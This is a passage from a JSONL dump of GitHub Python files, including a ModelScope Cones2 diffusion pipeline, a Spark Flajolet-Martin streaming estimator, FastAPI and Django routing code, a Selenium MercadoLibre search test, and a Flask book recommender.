vmin=-0.1, vmax=1.1);\nfig.colorbar(im1, ax=axs[0]);\naxs[0].set_title('Comparison field (k = {})'.format(k_lev));\n\n \n #k_lev = out_field.shape[0] // 2\n #im2 = axs[1].imshow(out_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\n #fig.colorbar(im2, ax=axs[1]);\n #axs[1].set_title('Final result (k = {})'.format(k_lev));\n \nplt.savefig('test.png')","repo_name":"colintully92/HPCproject","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22863625418","text":"import math\nfrom typing import Any, Dict\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom diffusers import LMSDiscreteScheduler, StableDiffusionPipeline\nfrom diffusers.models.attention_processor import Attention\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import \\\n StableDiffusionPipelineOutput\nfrom PIL import Image\nfrom tqdm.auto import tqdm\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.pipelines.multi_modal.diffusers_wrapped.diffusers_pipeline import \\\n DiffusersPipeline\nfrom modelscope.utils.constant import Tasks\n\n\n@PIPELINES.register_module(\n Tasks.text_to_image_synthesis, module_name=Pipelines.cones2_inference)\nclass Cones2InferencePipeline(DiffusersPipeline):\n r\"\"\" Cones2 Inference Pipeline.\n\n Examples:\n\n >>> from modelscope.pipelines import pipeline\n\n >>> pipeline =pipeline(task=Tasks.text_to_image_synthesis, model= 'damo/Cones2', model_revision='v1.0.1')\n >>> {\n >>> \"text\": 'a mug and a dog on the beach',\n >>> \"subject_list\": [[\"mug\", 2], [\"dog\", 5]],\n >>> \"color_context\": {\"255,192,0\": [\"mug\", 2.5], \"255,0,0\": [\"dog\", 2.5]},\n >>> \"layout\": 'data/test/images/mask_example.png'\n >>> }\n >>>\n \"\"\"\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a stable diffusion pipeline\n Args:\n model: model id on modelscope hub.\n device: str = 'gpu'\n \"\"\"\n super().__init__(model, device, **kwargs)\n self.pipeline = StableDiffusionPipeline.from_pretrained(model)\n self.pipeline.text_encoder.pooler = None\n self.pipeline.to(self.device)\n\n def forward(self, inputs: Dict[str, Any],\n **forward_params) -> Dict[str, Any]:\n if not isinstance(inputs, dict):\n raise ValueError(\n f'Expected the input to be a dictionary, but got {type(input)}'\n )\n if 'text' not in inputs:\n raise ValueError('input should contain \"text\", but not found')\n\n return self.layout_guidance_sampling(\n prompt=inputs.get('text'),\n residual_dict=inputs.get('residual_dict', None),\n subject_list=inputs.get('subject_list'),\n color_context=inputs.get('color_context', None),\n layout=inputs.get('layout', None),\n )\n\n @torch.no_grad()\n def layout_guidance_sampling(\n self,\n prompt='',\n residual_dict=None,\n subject_list=None,\n color_context=None,\n layout=None,\n cfg_scale=7.5,\n inference_steps=50,\n guidance_steps=50,\n guidance_weight=0.05,\n weight_negative=-1e8,\n ):\n\n layout = Image.open(layout).resize((768, 768)).convert('RGB')\n subject_color_dict = {\n tuple(map(int, key.split(','))): value\n for key, value in color_context.items()\n }\n\n vae = self.pipeline.vae\n unet = self.pipeline.unet\n text_encoder = self.pipeline.text_encoder\n tokenizer = self.pipeline.tokenizer\n unconditional_input_prompt = ''\n scheduler = LMSDiscreteScheduler.from_config(\n self.pipeline.scheduler.config)\n scheduler.set_timesteps(inference_steps, device=self.device)\n if guidance_steps > 0:\n guidance_steps = min(guidance_steps, inference_steps)\n scheduler_guidance = LMSDiscreteScheduler(\n beta_start=0.00085,\n beta_end=0.012,\n beta_schedule='scaled_linear',\n num_train_timesteps=1000,\n )\n scheduler_guidance.set_timesteps(\n guidance_steps, device=self.device)\n\n # Process input prompt text\n text_input = tokenizer(\n [prompt],\n padding='max_length',\n max_length=tokenizer.model_max_length,\n truncation=True,\n return_tensors='pt',\n )\n\n # Edit text embedding conditions with residual token embeddings.\n cond_embeddings = text_encoder(text_input.input_ids.to(self.device))[0]\n if residual_dict is not None:\n for name, token in subject_list:\n residual_token_embedding = torch.load(residual_dict[name])\n cond_embeddings[0][token] += residual_token_embedding.reshape(\n 1024)\n\n # Process unconditional input \"\" for classifier-free guidance.\n max_length = text_input.input_ids.shape[-1]\n uncond_input = tokenizer([unconditional_input_prompt],\n padding='max_length',\n max_length=max_length,\n return_tensors='pt')\n uncond_embeddings = text_encoder(\n uncond_input.input_ids.to(self.device))[0]\n\n register_attention_control(unet)\n\n # Calculate the hidden features for each cross attention layer.\n hidden_states, uncond_hidden_states = _extract_cross_attention(\n tokenizer, self.device, layout, subject_color_dict, text_input,\n weight_negative)\n hidden_states['CONDITION_TENSOR'] = cond_embeddings\n uncond_hidden_states['CONDITION_TENSOR'] = uncond_embeddings\n hidden_states['function'] = lambda w, sigma, qk: (\n guidance_weight * w * math.log(1 + sigma**2)) * qk.std()\n uncond_hidden_states['function'] = lambda w, sigma, qk: 0.0\n\n # Sampling the initial latents.\n latent_size = (1, unet.in_channels, 96, 96)\n latents = torch.randn(latent_size).to(self.device)\n latents = latents * scheduler.init_noise_sigma\n\n for i, t in tqdm(\n enumerate(scheduler.timesteps),\n total=len(scheduler.timesteps)):\n # Improve the harmony of generated images by self-recurrence.\n if i < guidance_steps:\n loop = 2\n else:\n loop = 1\n for k in range(loop):\n if i < guidance_steps:\n sigma = scheduler_guidance.sigmas[i]\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n\n hidden_states.update({'SIGMA': sigma})\n\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=hidden_states,\n ).sample\n\n uncond_hidden_states.update({'SIGMA': sigma})\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_hidden_states,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n # Self-recurrence.\n if k < 1 and loop > 1:\n noise_recurent = torch.randn(latents.shape).to(\n self.device)\n sigma_difference = scheduler.sigmas[\n i]**2 - scheduler.sigmas[i + 1]**2\n latents = latents + noise_recurent * (\n sigma_difference**0.5)\n else:\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=cond_embeddings,\n ).sample\n\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_embeddings,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n edited_images = _latents_to_images(vae, latents)\n\n return StableDiffusionPipelineOutput(\n images=edited_images, nsfw_content_detected=None)\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n images = []\n for img in inputs.images:\n if isinstance(img, Image.Image):\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n images.append(img)\n return {OutputKeys.OUTPUT_IMGS: images}\n\n\nclass Cones2AttnProcessor:\n\n def __init__(self):\n super().__init__()\n\n def __call__(self,\n attn: Attention,\n hidden_states,\n encoder_hidden_states=None,\n attention_mask=None):\n batch_size, sequence_length, _ = hidden_states.shape\n query = attn.to_q(hidden_states)\n is_dict_format = True\n if encoder_hidden_states is not None:\n if 'CONDITION_TENSOR' in encoder_hidden_states:\n encoder_hidden = encoder_hidden_states['CONDITION_TENSOR']\n else:\n encoder_hidden = encoder_hidden_states\n is_dict_format = False\n else:\n encoder_hidden = hidden_states\n\n key = attn.to_k(encoder_hidden)\n value = attn.to_v(encoder_hidden)\n\n query = attn.head_to_batch_dim(query)\n key = attn.head_to_batch_dim(key)\n value = attn.head_to_batch_dim(value)\n\n attention_scores = torch.matmul(query, key.transpose(-1, -2))\n attention_size_of_img = attention_scores.size()[-2]\n\n if attention_scores.size()[2] == 77:\n if is_dict_format:\n f = encoder_hidden_states['function']\n try:\n w = encoder_hidden_states[\n f'CA_WEIGHT_{attention_size_of_img}']\n except KeyError:\n w = encoder_hidden_states['CA_WEIGHT_ORIG']\n if not isinstance(w, int):\n img_h, img_w, nc = w.shape\n ratio = math.sqrt(img_h * img_w\n / attention_size_of_img)\n w = F.interpolate(\n w.permute(2, 0, 1).unsqueeze(0),\n scale_factor=1 / ratio,\n mode='bilinear',\n align_corners=True)\n w = F.interpolate(\n w.reshape(1, nc, -1),\n size=(attention_size_of_img, ),\n mode='nearest').permute(2, 1, 0).squeeze()\n else:\n w = 0\n if type(w) is int and w == 0:\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n else:\n bias = torch.zeros_like(w)\n bias[torch.where(w > 0)] = attention_scores.std() * 0\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n cross_attention_weight = cross_attention_weight + bias\n else:\n cross_attention_weight = 0.0\n else:\n cross_attention_weight = 0.0\n\n attention_scores = (attention_scores\n + cross_attention_weight) * attn.scale\n attention_probs = attention_scores.softmax(dim=-1)\n\n hidden_states = torch.matmul(attention_probs, value)\n hidden_states = attn.batch_to_head_dim(hidden_states)\n\n # linear proj\n hidden_states = attn.to_out[0](hidden_states)\n # dropout\n hidden_states = attn.to_out[1](hidden_states)\n\n return hidden_states\n\n\ndef register_attention_control(unet):\n attn_procs = {}\n for name in unet.attn_processors.keys():\n attn_procs[name] = Cones2AttnProcessor()\n\n unet.set_attn_processor(attn_procs)\n\n\ndef _tokens_img_attention_weight(img_context_seperated,\n tokenized_texts,\n ratio: int = 8,\n original_shape=False):\n token_lis = tokenized_texts['input_ids'][0].tolist()\n w, h = img_context_seperated[0][1].shape\n\n w_r, h_r = round(w / ratio), round(h / ratio)\n ret_tensor = torch.zeros((w_r * h_r, len(token_lis)), dtype=torch.float32)\n for v_as_tokens, img_where_color in img_context_seperated:\n\n is_in = 0\n\n for idx, tok in enumerate(token_lis):\n if token_lis[idx:idx + len(v_as_tokens)] == v_as_tokens:\n is_in = 1\n\n ret_tensor[:, idx:idx + len(v_as_tokens)] += (\n _downsampling(img_where_color, w_r,\n h_r).reshape(-1,\n 1).repeat(1, len(v_as_tokens)))\n\n if not is_in == 1:\n print(\n f'Warning ratio {ratio} : tokens {v_as_tokens} not found in text'\n )\n\n if original_shape:\n ret_tensor = ret_tensor.reshape((w_r, h_r, len(token_lis)))\n\n return ret_tensor\n\n\ndef _image_context_seperator(img, color_context: dict, _tokenizer, neg: float):\n ret_lists = []\n if img is not None:\n w, h = img.size\n matrix = np.zeros((h, w))\n for color, v in color_context.items():\n color = tuple(color)\n if len(color) > 3:\n color = color[:3]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n\n for color, (subject, weight_active) in color_context.items():\n if len(color) > 3:\n color = color[:3]\n v_input = _tokenizer(\n subject,\n max_length=_tokenizer.model_max_length,\n truncation=True,\n )\n\n v_as_tokens = v_input['input_ids'][1:-1]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n if not img_where_color.sum() > 0:\n print(\n f'Warning : not a single color {color} not found in image')\n\n img_where_color_init = torch.where(\n torch.tensor(img_where_color, dtype=torch.bool), weight_active,\n neg)\n\n img_where_color = torch.where(\n torch.from_numpy(matrix == 1) & (img_where_color_init == 0.0),\n torch.tensor(neg), img_where_color_init)\n\n ret_lists.append((v_as_tokens, img_where_color))\n else:\n w, h = 768, 768\n\n if len(ret_lists) == 0:\n ret_lists.append(([-1], torch.zeros((w, h), dtype=torch.float32)))\n return ret_lists, w, h\n\n\ndef _extract_cross_attention(tokenizer, device, color_map_image, color_context,\n text_input, neg):\n # Process color map image and context\n seperated_word_contexts, width, height = _image_context_seperator(\n color_map_image, color_context, tokenizer, neg)\n\n # Compute cross-attention weights\n cross_attention_weight_1 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=1,\n original_shape=True).to(device)\n cross_attention_weight_8 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=8).to(device)\n cross_attention_weight_16 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=16).to(device)\n cross_attention_weight_32 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=32).to(device)\n cross_attention_weight_64 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=64).to(device)\n\n hidden_states = {\n 'CA_WEIGHT_ORIG': cross_attention_weight_1, # 768 x 768\n 'CA_WEIGHT_9216': cross_attention_weight_8, # 96 x 96\n 'CA_WEIGHT_2304': cross_attention_weight_16, # 48 x 48\n 'CA_WEIGHT_576': cross_attention_weight_32, # 24 x 24\n 'CA_WEIGHT_144': cross_attention_weight_64, # 12 x 12\n }\n\n uncond_hidden_states = {\n 'CA_WEIGHT_ORIG': 0,\n 'CA_WEIGHT_9216': 0,\n 'CA_WEIGHT_2304': 0,\n 'CA_WEIGHT_576': 0,\n 'CA_WEIGHT_144': 0,\n }\n\n return hidden_states, uncond_hidden_states\n\n\ndef _downsampling(img: torch.tensor, w: int, h: int) -> torch.tensor:\n return F.interpolate(\n img.unsqueeze(0).unsqueeze(1),\n size=(w, h),\n mode='bilinear',\n align_corners=True,\n ).squeeze()\n\n\ndef _latents_to_images(vae, latents, scale_factor=0.18215):\n \"\"\"Decode latents to PIL images.\"\"\"\n scaled_latents = 1.0 / scale_factor * latents.clone()\n images = vae.decode(scaled_latents).sample\n images = (images / 2 + 0.5).clamp(0, 1)\n images = images.detach().cpu().permute(0, 2, 3, 1).numpy()\n\n if images.ndim == 3:\n images = images[None, ...]\n images = (images * 255).round().astype('uint8')\n pil_images = [Image.fromarray(image) for image in images]\n\n return pil_images\n\n\ndef _sanitize_parameters(self, **pipeline_parameters):\n \"\"\"\n this method should sanitize the keyword args to preprocessor params,\n forward params and postprocess params on '__call__' or '_process_single' method\n\n Returns:\n Dict[str, str]: preprocess_params = {'image_resolution': self.model.get_resolution()}\n Dict[str, str]: forward_params = pipeline_parameters\n Dict[str, str]: postprocess_params = {}\n \"\"\"\n pipeline_parameters['image_resolution'] = self.model.get_resolution()\n pipeline_parameters['modelsetting'] = self.model.get_config()\n pipeline_parameters['model_dir'] = self.model.get_model_dir()\n pipeline_parameters['control_type'] = self.init_control_type\n pipeline_parameters['device'] = self.device\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/cone2_pipeline/cones2_inference_pipeline.py","file_name":"cones2_inference_pipeline.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"12989041603","text":"\"\"\"\nGiven a Tree class, create a method called add that accepts a Node, and inserts it into a tree such that the tree continues to be a Binary Search Tree. The method should return nothing.\n\nA Binary Search Tree is a tree where every node has values greater than its data on the right-hand side, and values less than its data on the left-hand side, and all of the sub-tree nodes follow suit. Here's an example:\n\"\"\"\nimport sys\nsys.setrecursionlimit(1000)\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def print_bfs(self):\n if not self.root:\n return\n\n queue = [self.root]\n\n while len(queue) > 0:\n current_node = queue.pop(0)\n print(current_node.data)\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n\n def in_order_traversal(self):\n nodes = []\n\n def dfs(node):\n if node:\n\n dfs(node.left)\n nodes.append(node.data)\n dfs(node.right)\n\n dfs(self.root)\n return nodes\n\n def add(self, node):\n if not self.root:\n self.root = node\n return\n\n def insert(root, node):\n\n if root.data > node.data:\n if root.left is None:\n root.left = node\n else:\n insert(root.left, node)\n else:\n\n if root.right is None:\n root.right = node\n else:\n insert(root.right, node)\n\n insert(self.root, node)\n","repo_name":"makhmudislamov/cti_ips_2020","sub_path":"mod12_trees/insert_node.py","file_name":"insert_node.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20367162844","text":"import random\nimport binascii\nfrom statistics import mean,median\nfrom datetime import datetime\nimport findspark\nfindspark.init()\nfindspark.find()\nimport pyspark\nimport random\nimport json\nimport sys\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\n\ndef Prime_check(num):\n if num<=1:\n return False\n if num<=3:\n return True\n if num%2==0 or num%3==0:\n return False\n k = 5\n while k*k <= num:\n if (num%k == 0 or num%(k+2)==0):\n return False\n k=k + 6\n return True\n\n\n\ndef hasNumbers(inputString):\n for char in inputString:\n if char.isdigit() or inputString=='':\n return True\n if inputString=='':\n return True\n else:\n return False\n \n\n\ndef hashed_values2(hashfunction,conv_value,m):\n calc=((((hashfunction[0]*conv_value)+hashfunction[1])%hashfunction[2])%m)\n return calc\n\n\nhash_count=9\nrandom.seed(9001)\na = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1)\nb = random.choices([x for x in range(1000, 30000) if Prime_check(x)], k=hash_count+1) \ngenerated_prime = random.choices([x for x in range(1000000000, 1000000100) if Prime_check(x)],k=hash_count+1)\nhashed_list=[]\nfor points in zip(a,b,generated_prime):\n hashed_list.append([points[0],points[1],points[2]])\n \n\n\ndef Flajolet_Martin(stream):\n sizeGroup=3\n numHashes=9\n city_list=stream.collect()\n #print(len(city_list))\n m=2**(numHashes)\n true_value=len(set(city_list))\n #print(true_value)\n global hashed_list\n global outputFile\n \n L=[]\n for hashes in hashed_list:\n max_value=-1\n for cities in city_list:\n v=hasNumbers(cities)\n if v:\n pass\n else:\n hashing=int(binascii.hexlify(cities.encode('utf8')), 16)\n #print(hashing)\n hashed_value=hashed_values2(hashes,hashing,m)\n #print(hashed_value)\n #print(hashed_value)\n hashed_value=bin(hashed_value)[2:]\n length=len(hashed_value)-len(hashed_value.rstrip('0'))\n if (length > max_value):\n max_value = length\n #tail_zero.append(length)\n #max_value=max(tail_zero)\n L.append(2**max_value) \n Index_start=0\n groupAvgs=[] \n for end_Index in range(sizeGroup, numHashes, sizeGroup):\n groupAvgs.append(mean(L[Index_start:end_Index]))\n Index_start=end_Index\n estimated_value=median(groupAvgs)\n current_timestamp = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n out = str(current_timestamp) + \",\" + str(true_value) + \",\" + str(estimated_value) + \"\\n\"\n outputFile.write(out)\n outputFile.flush()\n return\n\n\n\nif __name__ == \"__main__\":\n print('Mohan')\n port=int(sys.argv[1])\n output_file_path=sys.argv[2]\n\n batch_size=5 \n \n\n sc = SparkContext('local[*]','test')\n sc.setLogLevel(\"OFF\")\n ssc = StreamingContext(sc, batch_size)\n dataRDD = ssc.socketTextStream(\"localhost\", port)\n\n\n outputFile = open(output_file_path, \"w\", encoding=\"utf-8\")\n out=\"Time,Ground Truth,Estimation\"+\"\\n\"\n outputFile.write(out)\n\n \n business_rdd=dataRDD.map(lambda x:json.loads(x))\n city_rdd=business_rdd.map(lambda x:x['city'])\n city_list=city_rdd.window(30, 10).foreachRDD(Flajolet_Martin)\n \n \n ssc.start()\n ssc.awaitTermination()\n\n\n\n","repo_name":"thotamohan/Spark-streaming","sub_path":"FlajoletMartin.py","file_name":"FlajoletMartin.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34279681447","text":"import datetime\nimport utils\nimport threading\nimport uuid\n\nclass Config:\n DEFAULT_CONFIG_SELF = {}\n\n DEFAULT_CONFIG = {\n 'settings': lambda: {},\n 'timestamp': lambda: datetime.datetime.now()\n }\n\n def __init__(self, config=None):\n self.run_default_config() # Always run this first\n self.logger = utils.setup_logger(self, 'DEBUG') # Always run this second\n\n if config:\n self.run_config(config) # Run the config if it exists\n\n def run_default_config(self):\n for key, default_value_func in self.DEFAULT_CONFIG_SELF.items():\n setattr(self, key, default_value_func(self))\n for key, default_value_func in self.DEFAULT_CONFIG.items():\n setattr(self, key, default_value_func())\n\n def run_config(self, config):\n for key, value in config.items():\n if hasattr(self, key) and not key.startswith('_'): # Skip these attributes\n setattr(self, key, value)\n self.logger.info(f\"Updated config for {self.__class__.__name__} with {config}\")\n\n # ... rest of your code ...\n\n def update(self, updates):\n if not isinstance(updates, dict):\n raise TypeError('updates should be a dictionary')\n self.settings.update(updates)\n self.timestamp = datetime.datetime.now()\n\n\n def __getitem__(self, key):\n try:\n return self.settings[key]\n except KeyError:\n raise KeyError(f'The key \"{key}\" does not exist in the configuration settings.')\n\n def get(self, key, default=None):\n return self.settings.get(key, default)\n\n def __contains__(self, key):\n return key in self.settings\n\n def __repr__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n def __str__(self):\n safe_settings = {k: '***' if k.lower().endswith('password') else v for k, v in self.settings.items()}\n return f'Config({safe_settings})'\n\n\nclass DefaultBotConfig:\n REQUIRED_KEYS = ['id', 'inventory', 'logger', 'lock', 'port', 'state', 'memory', 'brain']\n DEFAULT_CONFIG = {\n 'id': lambda: str(uuid.uuid4()),\n 'inventory': lambda: {'items': []},\n 'lock': lambda: threading.Lock(),\n '_created_at': lambda: datetime.datetime.now(),\n '_updated_at': lambda: datetime.datetime.now(),\n '_parent': lambda: None,\n '_logger_level': 'DEBUG',\n '_restricted_config_keys': lambda: {'id', 'port', 'state', 'memory', 'logger', 'lock'},\n 'is_thinking': False,\n 'is_updating': False,\n 'is_active': True,\n 'has_controller': False,\n }\n\n def __init__(self, custom_config=None):\n self.config = self.DEFAULT_CONFIG.copy()\n if custom_config:\n self.config.update(custom_config)\n self._verify_config()\n\n def _verify_config(self):\n for key in self.REQUIRED_KEYS:\n if key not in self.config:\n raise ValueError(f\"Missing required config key: {key}\")\n\n","repo_name":"ctavolazzi/winfobot","sub_path":"digital_highway/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"32656331189","text":"from django.urls import path\n\nfrom . views import RoomList,BookingListView, RoomDetailView, cancelBookingview\n\napp_name='hotelapp'\n\nurlpatterns = [\n path('room_list/', RoomList, name='RoomList'),\n path('booking_list/', BookingListView.as_view(), name='BookingListView'),\n path('room/<category>', RoomDetailView.as_view(), name='RoomDetailView'),\n path('booking/cancel/<pk>', cancelBookingview.as_view(), name='cancelBookingview'),\n \n]\n\n","repo_name":"ManvithaSukhavasi/room_booking","sub_path":"hotel/hotelapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4942014205","text":"import fastapi_users\nfrom fastapi import FastAPI\nfrom starlette.requests import Request\n\nfrom config import SECRET_KEY\nfrom core.db import database\nfrom core.fast_users import fastusers\nfrom task_app.routes import tasks_router\nfrom user_auth.jwt_config import jwt_authentication \nfrom user_auth.schemas import User\n\n\napp = FastAPI()\napp.include_router(\n fastusers.get_auth_router(jwt_authentication),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_register_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_reset_password_router(SECRET_KEY),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(\n fastusers.get_users_router(),\n prefix=\"/users\",\n tags=[\"users\"],\n)\napp.include_router(tasks_router, prefix=\"/tasks\", tags=[\"tasks\"])\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n# @fastusers.on_after_register()\n# def on_after_register(user: User, request: Request):\n# print(f\"User {user.id} has registered.\")\n\n\n# @fastusers.on_after_forgot_password()\n# def on_after_forgot_password(user: User, token: str, request: Request):\n# print(f\"User {user.id} has forgot their password. Reset token: {token}\")\n\n\n","repo_name":"StepanovSerjant/TestAppvelox","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70171785610","text":"from PIL import ImageGrab, ImageDraw\nimport scree_lib.eink as eink\n\nim = ImageGrab.grab(bbox=(0,0,800,480))\n\nepd = eink.EPD()\n\nepd.init()\nepd.Clear()\nepd.display(epd.getbuffer(im))\nepd.sleep()","repo_name":"firewallfail/eink-weather","sub_path":"update_screen.py","file_name":"update_screen.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40708047258","text":"import unittest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.support.ui import Select\nfrom time import sleep\n\n\nclass TestingMercadoLibre(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n s = Service('../chromedriver')\n cls.driver = webdriver.Chrome(service=s)\n driver = cls.driver\n driver.get(\"http://www.mercadolibre.com/\")\n driver.maximize_window()\n\n def test_serch_ps4(self):\n items = {}\n driver = self.driver\n country = driver.find_element(By.ID, 'CO')\n country.click()\n search_field = driver.find_element(By.NAME, 'as_word')\n search_field.click()\n search_field.clear()\n search_field.send_keys('playstation 4')\n search_field.submit()\n\n location = driver.find_element(By.XPATH, '//*[@id=\"root-app\"]/div/div/aside/section/div[6]/ul/li[1]/a/span[1]')\n driver.execute_script(\"arguments[0].click()\", location)\n sleep(3)\n\n codition = driver.find_element(By.PARTIAL_LINK_TEXT, 'Nuevo')\n codition.click()\n sleep(3)\n\n order_menu = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > button > span')\n order_menu.click()\n higher_price = driver.find_element(By.CSS_SELECTOR, '#root-app > div > div > section > div.ui-search-view-options__container > div > div > div > div.ui-search-sort-filter > div > div > div > ul > a:nth-child(3)')\n higher_price.click()\n sleep(3)\n\n for i in range(5):\n article_name = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[1]/a/h2').text\n article_price = driver.find_element(By.XPATH, f'//*[@id=\"root-app\"]/div/div/section/ol/li[{i + 1}]/div/div/div[2]/div[2]/div[1]/div[1]/div/div/div/span[1]/span[2]/span[2]').text\n items[article_name] = article_price\n print(items)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"JavierLGZ/selenium-platzi","sub_path":"prueba_tecnica/mercadolibre.py","file_name":"mercadolibre.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36040003994","text":"from flask import Flask,render_template,request \r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport pandas as pd\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity,linear_kernel \r\nfrom flask import Flask, render_template, request, jsonify\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nmodel = tf.keras.models.load_model('my_model.h5')\r\napp = Flask(__name__)\r\ndef load_data(data):\r\n df= pd.read_csv(data, sep= ';', error_bad_lines= False, encoding= 'latin-1')\r\n df=df.head(500)\r\n return df\r\n\r\ndef search_term_if_not_found(term,df):\r\n term = term.capitalize()\r\n result_df= df[df['Book-Title'].str.contains(term)]\r\n return result_df['Book-Title'].iloc[0] \r\n\r\ndef vectorize_text_to_cosine_max(data):\r\n count_vec= CountVectorizer()\r\n cv_mat= count_vec.fit_transform(data)\r\n cosine_sim=cosine_similarity(cv_mat)\r\n return cosine_sim\r\n# \r\ndef get_recommendation(title,cosine_sim_mat,df,num_of_rec=8):\r\n course_indices=pd.Series(df.index,index=df['Book-Title']).drop_duplicates()\r\n idx=course_indices[title]\r\n sim_scores=list(enumerate(cosine_sim_mat[idx]))\r\n sim_scores= sorted(sim_scores,key=lambda x:x[1],reverse=True)\r\n selected_course_indices=[i[0] for i in sim_scores[1:]]\r\n selected_course_score=[i[0] for i in sim_scores[1:]]\r\n result_df= df.iloc[selected_course_indices] \r\n result_df['similarity score']=selected_course_score\r\n final_recommeded= result_df[['Book-Title','Book-Author','Year-Of-Publication','similarity score','Image-URL-L']]\r\n return final_recommeded.head(num_of_rec)\r\ndf=load_data('https://raw.githubusercontent.com/tttgm/fellowshipai/master/book_crossing_dataset/BX-Books.csv')\r\ncosine_sim_mat=vectorize_text_to_cosine_max(df['Book-Title'])\r\ndef get_suggestions():\r\n data = pd.read_csv(\"https://raw.githubusercontent.com/sahilpocker/Book-Recommender-System/master/Dataset/books.csv\")\r\n return list(data['title'].str.capitalize())\r\n@app.route('/')\r\ndef login():\r\n return 